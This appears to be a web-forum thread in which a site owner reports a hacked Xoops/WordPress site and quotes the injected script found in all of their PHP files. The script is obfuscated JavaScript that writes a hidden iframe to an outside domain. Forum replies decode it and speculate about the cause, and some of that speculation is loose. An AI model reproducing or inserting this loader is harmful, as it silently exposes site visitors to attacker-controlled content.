Hi everyone

I have a website, running for years without any problem, and all of a sudden, today, it does not display any pages. All is blank!

The website in question is a Xoops installation.

I accessed my directory and files via cpanel, and first went to see if I can see my index.php and yes, it seems like all files and folders are still there. I viewed the code on the index file, and found some script there, that I am sure I haven't ever seen before. The same script appears on all other .php files in my public directory. I am a very novice at php, and don't know what this means.

The script in question is as follow:

<?php echo '<script type="text/javascript">function count(str){var res = "";for(i = 0; i < str.length; ++i) { n = str.charCodeAt(i); res += String.fromCharCode(n - (2)); } return res; }; document.write(count(">khtcog\"ute?jvvr<11yyy0yr/uvcvu/rjr0kphq1khtcog1yr/uvcvu0rjr\"ykfvj?3\"jgkijv?3\"htcogdqtfgt?2@"));</script>';?>

Is there someone that can help me, first of all, to confirm that I was hacked, and seconly, understands this script on all my files, and thirdly, wisen me up on how to restore my site.

I was very stupid not to have any recent back up, but it apears my files are all there, as well as all databse.

Please help this poor monkey!

Hmm.. I am not sure if your site is hacked.. But when that javascript was 'decoded', it gave me the url, http://www.wp-stats-php.info/ . The complete URL was Umm.. Have you seen this iframe before ? I have never been in this position before, so maybe someone else has something better to say..

It's so called "script injection".

Are you using Wordpress blogs or WP-Stats in your website? For they are particularly vunerable?.The way that is done is with specially crafted SQL using certain parameters to then gain access to the back-end database.

Check your database and see the post in there.

Oh, cross site scripting ! Hmm..

Yeah. XSS! Some how they found an exploit in the posting of blogs on a user's site in which they use the HTML <!-- Comments --> <!-- Traffic Statistics --> Exploitary code here <!-- End Traffic Statistics -->

Perhaps the blog software uses SSI, which could explain something.

As for the OP's problem, I'm not sure how the heck the attacker inject php because php is server side so shouldn't execute from the page. =\

Thanks for all the replies.

Yes, I saw that the pages all were refering to http://www.wp-stats-php.info/ in the taskbar, untill "done" and only a blank page displays.

Yes, there are two wordpress blogs on the domain.

No, the iframe should not be there.

The hacker even left me a message in one of the index php files of the main site, saying: "Silence is golden"

This is a very large site, and as said before, all php files were injected with this script.

The two wordpress blogs were in seperate folders, and public access was /domainname/blogname/

On the main domain, is a Xoops installation.

What I understand, from this thread, is that the hacker gained access thru wordpress mysql databasis, and from there also attack the Xoops databasis, injecting his script everywhere?

If I am able to restore a backup, where and how should I go and plug these holes in wordpress? I am novice, and only know a little of database and php etc. That is one of the reasons I am on this forum, to learn from you who know, and I think Daniweb is one of the most resourceful knowledge building forums ever exists.